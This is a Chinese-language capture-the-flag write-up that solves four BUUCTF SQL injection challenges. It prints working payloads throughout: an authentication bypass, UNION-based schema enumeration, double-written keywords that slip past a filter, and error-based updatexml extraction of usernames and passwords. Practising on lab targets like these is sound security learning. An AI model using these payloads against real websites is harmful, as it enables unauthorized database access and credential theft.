BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL

小白一个,记录一下解题过程,如有错误请指正!

一、EasySQL

1.这里我们使用一句话万能密码就可以了,记得加上#

1' or '1'='1'#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第1张图片

2.登录就可以拿到flag

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第2张图片 

二、LoveSQL

        网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~

1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第3张图片

 2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数

1' union select 1,2,3#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第4张图片

登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显

1' union select 1,2,3,4#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第5张图片

 3.开始爆数据库

1' union select 1,2,database()#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第6张图片

4.数据库名为geek,爆表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第7张图片

 5.很显然l0ve1ysq1是我们想要的表,谁让他和题目长得很像呢~,爆字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第8张图片

 6.flag应该在username或者password里了,用concat_ws函数连起来全部看一下。

1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第9张图片

 太长了看不完,直接看网页源代码即可

三、BabySQL

1.还是先用万能句试一下,发现不行了,应该是设置了关键字过滤,用burp看一下过滤了那些关键字

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第10张图片

 

or,and,union,select,where等都被过滤了,试了一下改大小写,双写,发现双写注入是可以的

1' oorr '1'='1'#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第11张图片

 2.那我们就是用双写注入,查一下列数,发现还是只有三列

1' ununionion selselectect 1,2,3#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第12张图片

3.爆数据库

1' ununionion selselectect 1,2,database()#

 BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第13张图片

4.熟悉的数据库名,开始爆表名 

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第14张图片

5.爆字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第15张图片

6.查看username,password两个字段

1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#

 BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第16张图片

 7.查看网页源代码就可以看到完整的flag了

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第17张图片

 四、HardSQL

1.在这一题发现万能句,双写都不能用了,总是出现这样一个页面

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第18张图片

2.应该还是把某些关键字过滤掉了,用burp再fuzz一下,发现空格,union,*,=都被过滤了,但是updatexml和extractvalue没被过滤,可以考虑使用报错注入

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第19张图片

3.因为空格和*号都被过滤掉了,就不能使用/**/绕过空格了,不过可以使用()绕过,爆数据库

1'or(updatexml(1,concat('~',(select(database()))),1))#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第20张图片

 4.又是熟悉的数据库名,开始爆表名

1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第21张图片

5.爆字段

1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第22张图片

6.查看username,password ,不过根据经验应该是在password里是没错了

1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第23张图片

7.没显示完全,因为updatexml函数只能显示前32位,但是mid,substr函数也被过滤掉了,那可以使用right函数

1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))#   

BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL_第24张图片

8.拼起来就是flag啦

flag{651cd7be-7e7e-4463-9bee-9b451fc0039d} 

参考文章:

https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html

https://www.cnblogs.com/sipc-love/p/14266070.html

 

 

 

你可能感兴趣的:(CTF,SQL注入,web安全)